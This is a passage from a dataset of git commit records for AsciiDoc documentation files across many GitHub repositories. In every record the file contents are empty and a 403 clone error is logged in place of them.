arch,KimTaehee\/elasticsearch,mjason3\/elasticsearch,likaiwalkman\/elasticsearch,kcompher\/elasticsearch,Rygbee\/elasticsearch,pranavraman\/elasticsearch,hydro2k\/elasticsearch,karthikjaps\/elasticsearch,kcompher\/elasticsearch,nellicus\/elasticsearch,springning\/elasticsearch,iacdingping\/elasticsearch,masterweb121\/elasticsearch,sdauletau\/elasticsearch,areek\/elasticsearch,AndreKR\/elasticsearch,djschny\/elasticsearch,yanjunh\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,TonyChai24\/ESSource,Siddartha07\/elasticsearch,wbowling\/elasticsearch,truemped\/elasticsearch,achow\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mbrukman\/elasticsearch,kalburgimanjunath\/elasticsearch,linglaiyao1314\/elasticsearch,girirajsharma\/elasticsearch,ulkas\/elasticsearch,djschny\/elasticsearch,iantruslove\/elasticsearch,s1monw\/elasticsearch,jimhooker2002\/elasticsearch,IanvsPoplicola\/elasticsearch,i-am-Nathan\/elasticsearch,gingerwizard\/elasticsearch,sc0ttkclark\/elasticsearch,18098924759\/elasticsearch,andrejserafim\/elasticsearch,dylan8902\/elasticsearch,robin13\/elasticsearch,yongminxia\/elasticsearch,KimTaehee\/elasticsearch,sreeramjayan\/elasticsearch,zeroctu\/elasticsearch,tahaemin\/elasticsearch,tahaemin\/elasticsearch,njlawton\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,LewayneNaidoo\/elasticsearch,JackyMai\/elasticsearch,ckclark\/elasticsearch,pritishppai\/elasticsearch,pozhidaevak\/elasticsearch,HarishAtGitHub\/elasticsearch,karthikjaps\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra-test,knight1128\/elasticsearch,lightslife\/elasticsearch,henakamaMSFT\/elasticsearch,weipinghe\/elasticsearch,diendt\/elasticsearch,bestwpw\/elasticsearch,btiernay\/elasticsearch,naveenhooda2000\/elasticsearch,pranavraman\/elasticsearch,artnowo\/elasticsearch,iacdingping\/elasticsearch,Shepard1212\/elasticsearch,lzo\/elasticsearch-1,petabytedata\/elasticsearch,jprante\/elasticsearch,nomoa\/elasticsearch,iamjakob\/elasticsearch,mute\/elasticsearch,yongminxia\/elasticsearch,weipinghe\/elasticsearch,glefloch\/elasticsearch,hirdesh2008\/elasticsearch,Shekharrajak\/elasticsearch,luiseduardohdbackup\/elasticsearch,Fsero\/elasticsearch,kalimatas\/elasticsearch,JackyMai\/elasticsearch,beiske\/elasticsearch,schonfeld\/elasticsearch,tebriel\/elasticsearch,bawse\/elasticsearch,himanshuag\/elasticsearch,ulkas\/elasticsearch,karthikjaps\/elasticsearch,drewr\/elasticsearch,adrianbk\/elasticsearch,nellicus\/elasticsearch,Helen-Zhao\/elasticsearch,strapdata\/elassandra-test,karthikjaps\/elasticsearch,strapdata\/elassandra-test,kalburgimanjunath\/elasticsearch,shreejay\/elasticsearch,btiernay\/elasticsearch,AndreKR\/elasticsearch,myelin\/elasticsearch,vroyer\/elasticassandra,scorpionvicky\/elasticsearch,ckclark\/elasticsearch,episerver\/elasticsearch,mikemccand\/elasticsearch,likaiwalkman\/elasticsearch,pritishppai\/elasticsearch,rento19962\/elasticsearch,wbowling\/elasticsearch,Shekharrajak\/elasticsearch,fforbeck\/elasticsearch,rmuir\/elasticsearch,hafkensite\/elasticsearch,vroyer\/elasticassandra,camilojd\/elasticsearch,naveenhooda2000\/elasticsearch,Widen\/elasticsearch,mjhennig\/elasticsearch,andrestc\/elasticsearch,F0lha\/elasticsearch,jango2015\/elasticsearch,kevinkluge\/elasticsearch,wittyameta\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra5-rc,ESamir\/elasticsearch,sneivandt\/elasticsearch,lzo\/elasticsearch-1,gingerwizard\/elasticsearch,pablocastro\/elasticsearch,davidvgalbraith\/elasticsearch,mjhennig\/elasticsearch,elancom\/elasticsearch,scorpionvicky\/elasticsearch,vingupta3\/elasticsearch,Uiho\/elasticsearch,mm0\/elasticsearch,mcku\/elasticsearch,bestwpw\/elasticsearch,davidvgalbraith\/elasticsearch,hirdesh2008\/elasticsearch,kcompher\/elasticsearch,trangvh\/elasticsearch,amit-shar\/elasticsearch,fernandozhu\/elasticsearch,mm0\/elasticsearch,MichaelLiZhou\/elasticsearch,hydro2k\/elasticsearch,linglaiyao1314\/elasticsearch,PhaedrusTheGreek\/elasticsearch,beiske\/elasticsearch,palecur\/elasticsearch,a2lin\/elasticsearch,knight1128\/elasticsearch,HonzaKral\/elasticsearch,masterweb121\/elasticsearch,gingerwizard\/elasticsearch,ZTE-PaaS\/elasticsearch,Liziyao\/elasticsearch,wenpos\/elasticsearch,kenshin233\/elasticsearch,C-Bish\/elasticsearch,xuzha\/elasticsearch,Collaborne\/elasticsearch,EasonYi\/elasticsearch,himanshuag\/elasticsearch,alexshadow007\/elasticsearch,jbertouch\/elasticsearch,alexshadow007\/elasticsearch,diendt\/elasticsearch,Stacey-Gammon\/elasticsearch,kunallimaye\/elasticsearch,Ansh90\/elasticsearch,Uiho\/elasticsearch,wimvds\/elasticsearch,humandb\/elasticsearch,Collaborne\/elasticsearch,infusionsoft\/elasticsearch,zhiqinghuang\/elasticsearch,sposam\/elasticsearch,sdauletau\/elasticsearch,bestwpw\/elasticsearch,kevinkluge\/elasticsearch,wayeast\/elasticsearch,cwurm\/elasticsearch,rmuir\/elasticsearch,shreejay\/elasticsearch,Shekharrajak\/elasticsearch,jango2015\/elasticsearch,beiske\/elasticsearch,andrestc\/elasticsearch,caengcjd\/elasticsearch,jchampion\/elasticsearch,trangvh\/elasticsearch,onegambler\/elasticsearch,zkidkid\/elasticsearch,kcompher\/elasticsearch,weipinghe\/elasticsearch,franklanganke\/elasticsearch,acchen97\/elasticsearch,F0lha\/elasticsearch,andrestc\/elasticsearch,EasonYi\/elasticsearch,rhoml\/elasticsearch,F0lha\/elasticsearch,tkssharma\/elasticsearch,rajanm\/elasticsearch,JSCooke\/elasticsearch,linglaiyao1314\/elasticsearch,yanjunh\/elasticsearch,weipinghe\/elasticsearch,nezirus\/elasticsearch,LeoYao\/elasticsearch,jpountz\/elasticsearch,xuzha\/elasticsearch,sc0ttkclark\/elasticsearch,cnfire\/elasticsearch-1,sreeramjayan\/elasticsearch,gfyoung\/elasticsearch,ESamir\/elasticsearch,myelin\/elasticsearch,apepper\/elasticsearch,kevinkluge\/elasticsearch,MaineC\/elasticsearch,amit-shar\/elasticsearch,mcku\/elasticsearch,LewayneNaidoo\/elasticsearch,Shekharrajak\/elasticsearch,masaruh\/elasticsearch,henakamaMSFT\/elasticsearch,elancom\/elasticsearch,mbrukman\/elasticsearch,kimimj\/elasticsearch,Widen\/elasticsearch,luiseduardohdbackup\/elasticsearch,girirajsharma\/elasticsearch,mnylen\/elasticsearch,btiernay\/elasticsearch,hirdesh2008\/elasticsearch,ricardocerq\/elasticsearch,elasticdog\/elasticsearch,Uiho\/elasticsearch,knight1128\/elasticsearch,markharwood\/elasticsearch,snikch\/elasticsearch,sdauletau\/elasticsearch,masterweb121\/elasticsearch,maddin2016\/elasticsearch,infusionsoft\/elasticsearch,Siddartha07\/elasticsearch,MaineC\/elasticsearch,markllama\/elasticsearch,sreeramjayan\/elasticsearch,Liziyao\/elasticsearch,linglaiyao1314\/elasticsearch,geidies\/elasticsearch,jpountz\/elasticsearch,Shekharrajak\/elasticsearch,lydonchandra\/elasticsearch,ImpressTV\/elasticsearch,mcku\/elasticsearch,rajanm\/elasticsearch,C-Bish\/elasticsearch,apepper\/elasticsearch,18098924759\/elasticsearch,scottsom\/elasticsearch,lzo\/elasticsearch-1,mute\/elasticsearch,markwalkom\/elasticsearch,davidvgalbraith\/elasticsearch,PhaedrusTheGreek\/elasticsearch,dataduke\/elasticsearch,Fsero\/elasticsearch,GlenRSmith\/elasticsearch,camilojd\/elasticsearch,naveenhooda2000\/elasticsearch,rhoml\/elasticsearch,hafkensite\/elasticsearch,wayeast\/elasticsearch,slavau\/elasticsearch,TonyChai24\/ESSource,Fsero\/elasticsearch,jimczi\/elasticsearch,ImpressTV\/elasticsearch,jango2015\/elasticsearch,wittyameta\/elasticsearch,lks21c\/elasticsearch,xingguang2013\/elasticsearch,fernandozhu\/elasticsearch,abibell\/elasticsearch,queirozfcom\/elasticsearch,jeteve\/elasticsearch,djschny\/elasticsearch,zhiqinghuang\/elasticsearch,gingerwizard\/elasticsearch,lchennup\/elasticsearch,diendt\/elasticsearch,sposam\/elasticsearch,lightslife\/elasticsearch,ImpressTV\/elasticsearch,ckclark\/elasticsearch,ckclark\/elasticsearch,linglaiyao1314\/elasticsearch,himanshuag\/elasticsearch,yynil\/elasticsearch,rento19962\/elasticsearch,KimTaehee\/elasticsearch,shreejay\/elasticsearch,xuzha\/elasticsearch,Brijeshrpatel9\/elasticsearch,coding0011\/elasticsearch,dpursehouse\/elasticsearch,rlugojr\/elasticsearch,zeroctu\/elasticsearch,avikurapati\/elasticsearch,NBSW\/elasticsearch,iacdingping\/elasticsearch,kingaj\/elasticsearch,vingupta3\/elasticsearch,brandonkearby\/elasticsearch,Siddartha07\/elasticsearch,cwurm\/elasticsearch,wimvds\/elasticsearch,jimczi\/elasticsearch,polyfractal\/elasticsearch,drewr\/elasticsearch,nellicus\/elasticsearch,acchen97\/elasticsearch,elancom\/elasticsearch,jimhooker2002\/elasticsearch,sarwarbhuiyan\/elasticsearch,MichaelLiZhou\/elasticsearch,lchennup\/elasticsearch,abibell\/elasticsearch,kaneshin\/elasticsearch,yuy168\/elasticsearch,rlugojr\/elasticsearch,a2lin\/elasticsearch,lightslife\/elasticsearch,sdauletau\/elasticsearch,girirajsharma\/elasticsearch,LeoYao\/elasticsearch,nilabhsagar\/elasticsearch,mapr\/elasticsearch,ouyangkongtong\/elasticsearch,iantruslove\/elasticsearch,dataduke\/elasticsearch,rlugojr\/elasticsearch,nezirus\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,wayeast\/elasticsearch,brandonkearby\/elasticsearch,JackyMai\/elasticsearch,markharwood\/elasticsearch,dataduke\/elasticsearch,ivansun1010\/elasticsearch,nellicus\/elasticsearch,mikemccand\/elasticsearch,rhoml\/elasticsearch,MetSystem\/elasticsearch,gfyoung\/elasticsearch,umeshdangat\/elasticsearch,Collaborne\/elasticsearch,cwurm\/elasticsearch,MjAbuz\/elasticsearch,hirdesh2008\/elasticsearch,truemped\/elasticsearch,diendt\/elasticsearch,kalburgimanjunath\/elasticsearch,tkssharma\/elasticsearch,Brijeshrpatel9\/elasticsearch,kenshin233\/elasticsearch,jeteve\/elasticsearch,Collaborne\/elasticsearch,umeshdangat\/elasticsearch,LeoYao\/elasticsearch,wbowling\/elasticsearch,strapdata\/elassandra5-rc,amit-shar\/elasticsearch,lks21c\/elasticsearch,mmaracic\/elasticsearch,elancom\/elasticsearch,spiegela\/elasticsearch,rajanm\/elasticsearch,fred84\/elasticsearch,iantruslove\/elasticsearch,jchampion\/elasticsearch,infusionsoft\/elasticsearch,Ansh90\/elasticsearch,Charlesdong\/elasticsearch,caengcjd\/elasticsearch,lydonchandra\/elasticsearch,naveenhooda2000\/elasticsearch","old_file":"docs\/reference\/setup\/as-a-service.asciidoc","new_file":"docs\/reference\/setup\/as-a-service.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0baaa474267da86675f502df14cbc13ad65bc0d4","subject":"Created release notes @ 4.6.11","message":"Created release notes @ 4.6.11\n","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"draft-docs\/release_notes.adoc","new_file":"draft-docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"06388e3e08f4bfd53172930cfed97e2fc3e9cc3f","subject":"Create boileaum.adoc (#14)","message":"Create boileaum.adoc (#14)\n\nRelated to #5","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_team\/boileaum.adoc","new_file":"_team\/boileaum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"742fa13613c7104bf3ad318748b6df6306db7845","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6e5ad0f10cd8d964a200685971745c7a0ce60be","subject":"Create handsondataviz.asciidoc","message":"Create handsondataviz.asciidoc\n","repos":"JackDougherty\/datavizforall,JackDougherty\/datavizbook","old_file":"docs\/handsondataviz.asciidoc","new_file":"docs\/handsondataviz.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JackDougherty\/datavizbook.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65fb4ab6626ac891a60c88da3248093f8063de1e","subject":"Updated goals.adoc","message":"Updated goals.adoc\n","repos":"oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv","old_file":"docs\/goals.adoc","new_file":"docs\/goals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aa49ffc576e8f7144389449005c5e6d18af29398","subject":"Adding README.adoc","message":"Adding README.adoc\n","repos":"ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor","old_file":"scratch\/README.adoc","new_file":"scratch\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ECP-CANDLE\/Supervisor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f5b682bfd1f13c55a1eb6b783cbd3c61f664a7b","subject":"Describe why to use relative paths","message":"Describe why to use relative paths\n\nNinja does resolve relative paths and file system links in paths.\nTherefore, such paths pointing to the same file will not match and may\nlead to an invalid dependency graph.\n\nSigned-off-by: Fredrik Medley <2561cb753b9f9bbf117fab473f743d00967b80ea@gmail.com>\n","repos":"ninja-build\/ninja,martine\/ninja,mohamed\/ninja,tfarina\/ninja,Maratyszcza\/ninja-pypi,martine\/ninja,nafest\/ninja,nafest\/ninja,sgraham\/ninja,AoD314\/ninja,nicolasdespres\/ninja,Qix-\/ninja,Qix-\/ninja,mydongistiny\/ninja,nafest\/ninja,lizh06\/ninja,sxlin\/dist_ninja,moroten\/ninja,maruel\/ninja,atetubou\/ninja,vvvrrooomm\/ninja,automeka\/ninja,nicolasdespres\/ninja,sxlin\/dist_ninja,Qix-\/ninja,ninja-build\/ninja,fuchsia-mirror\/third_party-ninja,maruel\/ninja,vvvrrooomm\/ninja,tfarina\/ninja,Qix-\/ninja,iwadon\/ninja,bradking\/ninja,nico\/ninja,maruel\/ninja,fuchsia-mirror\/third_party-ninja,mohamed\/ninja,moroten\/ninja,AoD314\/ninja,moroten\/ninja,ndsol\/subninja,ninja-build\/ninja,sxlin\/dist_ninja,nicolasdespres\/ninja,ndsol\/subninja,atetubou\/ninja,mgaunard\/ninja,nico\/ninja,atetubou\/ninja,moroten\/ninja,mydongistiny\/ninja,sgraham\/ninja,vvvrrooomm\/ninja,bradking\/ninja,Maratyszcza\/ninja-pypi,mohamed\/ninja,iwadon\/ninja,lizh06\/ninja,mgaunard\/ninja,vvvrrooomm\/ninja,atetubou\/ninja,tfarina\/ninja,Maratyszcza\/ninja-pypi,juntalis\/ninja,mgaunard\/ninja,mydongistiny\/ninja,sgraham\/ninja,lizh06\/ninja,tfarina\/ninja,sxlin\/dist_ninja,AoD314\/ninja,juntalis\/ninja,ninja-build\/ninja,fuchsia-mirror\/third_party-ninja,nico\/ninja,juntalis\/ninja,mgaunard\/ninja,fuchsia-mirror\/third_party-ninja,martine\/ninja,juntalis\/ninja,automeka\/ninja,mydongistiny\/ninja,sxlin\/dist_ninja,mohamed\/ninja,bradking\/ninja,nafest\/ninja,bradking\/ninja,ndsol\/subninja,sxlin\/dist_ninja,ndsol\/subninja,sxlin\/dist_ninja,AoD314\/ninja,iwadon\/ninja,iwadon\/ninja,nico\/ninja,maruel\/ninja,automeka\/ninja,automeka\/ninja,lizh06\/ninja,Maratyszcza\/ninja-pypi,sgraham\/ninja,nicolasdespres\/ninja,martine\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nafest\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"76693322eef31f6217c4e19388a0ad39bf1e7568","subject":"Note\/link to api docs.","message":"Note\/link to api docs.\n","repos":"hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,brechin\/hypatia,brechin\/hypatia,Applemann\/hypatia,Applemann\/hypatia,lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2861dd467e47a031cfa4a8a0217205e0d90074d9","subject":"Adds travis build status","message":"Adds travis build status","repos":"MatousJobanek\/arquillian-core,bartoszmajsak\/arquillian-core,arquillian\/arquillian-core,rhusar\/arquillian-core,bartoszmajsak\/arquillian-core,rhusar\/arquillian-core,MatousJobanek\/arquillian-core","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/arquillian-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"106f45e8572ec750b85f1414d62bd73cca2b6639","subject":"Add Coverity Scan badge to readme","message":"Add Coverity Scan badge to readme\n\n[skip ci]\n","repos":"lassik\/respace,lassik\/respace","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lassik\/respace.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"5652ecc94e06f8b7107869c9090ba26f0f9b4c39","subject":"asciidoc formatting Signed-off-by:Ondrej Mihalyi <ondrej.mihalyi@gmail.com>","message":"asciidoc formatting\nSigned-off-by:Ondrej Mihalyi <0548979e2ac15cccb3e6ca41d0de8b4627382aff@gmail.com>","repos":"jbosstm\/microprofile-sandbox","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosstm\/microprofile-sandbox.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9744dec71741a7c6935d73e5f1e7d59d20e4e13","subject":"y2b create post 3 Cool Tech Deals - #10","message":"y2b create post 3 Cool Tech Deals - #10","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-12-3-Cool-Tech-Deals--10.adoc","new_file":"_posts\/2015-10-12-3-Cool-Tech-Deals--10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18ebd86e8516547becdc21eadbe3acb37d5c4057","subject":"Publish 2015-5-10-uGUI.adoc","message":"Publish 2015-5-10-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGUI.adoc","new_file":"2015-5-10-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32cbbc2ecfbb28ebd02c5a09f9b21b372d906464","subject":"Revert \"[DOCS] Added 6.3 info & updated the upgrade table. (#30940)\"","message":"Revert \"[DOCS] Added 6.3 info & updated the upgrade table. (#30940)\"\n\nThis reverts commit 40d31d2ae0e5d1004a72de44738948434c8e7a06.\n","repos":"gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/reference\/upgrade.asciidoc","new_file":"docs\/reference\/upgrade.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8cb38995fe813bdf0285f091486ad6ae1b556e4","subject":"Create 01-1-Caqdas.adoc","message":"Create 01-1-Caqdas.adoc","repos":"jmunoz298\/Atlasti7,jmunoz298\/atlasti,jmunoz298\/Atlasti7,jmunoz298\/atlasti,jmunoz298\/atlasti,jmunoz298\/Atlasti7","old_file":"01-1-Caqdas.adoc","new_file":"01-1-Caqdas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmunoz298\/atlasti.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b8257cb854edd4c5f6dc13fddbb8ffc04481c2d1","subject":"CL: split string","message":"CL: split string\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"69b6f321630373d3304cd6ec4e2f622706527a8d","subject":"Ex init","message":"Ex init\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Rest client Ex.adoc","new_file":"Rest client Ex.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b8000b89f8a0162df12afadb00088a941f7e27d","subject":"add errors-sentry doc","message":"add errors-sentry doc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/errors-sentry.adoc","new_file":"userguide\/tutorials\/errors-sentry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6043e36e500f45f4a23f9fc3ddd097ffcd83ff82","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af4730621f1cfcd0f29f035eebe0d8527ba2d859","subject":"y2b create post Gears of War 3 Throat Communicator Unboxing \\u0026 Overview","message":"y2b create post Gears of War 3 Throat Communicator Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-22-Gears-of-War-3-Throat-Communicator-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-09-22-Gears-of-War-3-Throat-Communicator-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c1d91392887e80161e39f28768bf1dc07b5c793","subject":"Update 2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","message":"Update 2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","new_file":"_posts\/2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1f6e898e20d79e1ecfbb41f6f7ff38dc81a51c3","subject":"Delete the file at '_posts\/2017-10-01-raindrop.adoc'","message":"Delete the file at '_posts\/2017-10-01-raindrop.adoc'","repos":"ecmeyva\/ecmeyva.github.io,ecmeyva\/ecmeyva.github.io,ecmeyva\/ecmeyva.github.io,ecmeyva\/ecmeyva.github.io","old_file":"_posts\/2017-10-01-raindrop.adoc","new_file":"_posts\/2017-10-01-raindrop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ecmeyva\/ecmeyva.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d7820cbb19aec0d978ea24c40c9ab024c6dd9a3","subject":"Update 2015-02-24-Second-Post.adoc","message":"Update 2015-02-24-Second-Post.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-Second-Post.adoc","new_file":"_posts\/2015-02-24-Second-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e4010d371c6db3f3d5583c083bdfce046a7a95f","subject":"Update 2016-03-02-Hello-World.adoc","message":"Update 2016-03-02-Hello-World.adoc","repos":"deruelle\/deruelle.github.io,deruelle\/deruelle.github.io,deruelle\/deruelle.github.io,deruelle\/deruelle.github.io","old_file":"_posts\/2016-03-02-Hello-World.adoc","new_file":"_posts\/2016-03-02-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deruelle\/deruelle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33d267fea16024c9b708c94029de82b890d2d77a","subject":"Update 2016-04-29-Lorem-Ipsum.adoc","message":"Update 2016-04-29-Lorem-Ipsum.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2016-04-29-Lorem-Ipsum.adoc","new_file":"_posts\/2016-04-29-Lorem-Ipsum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL 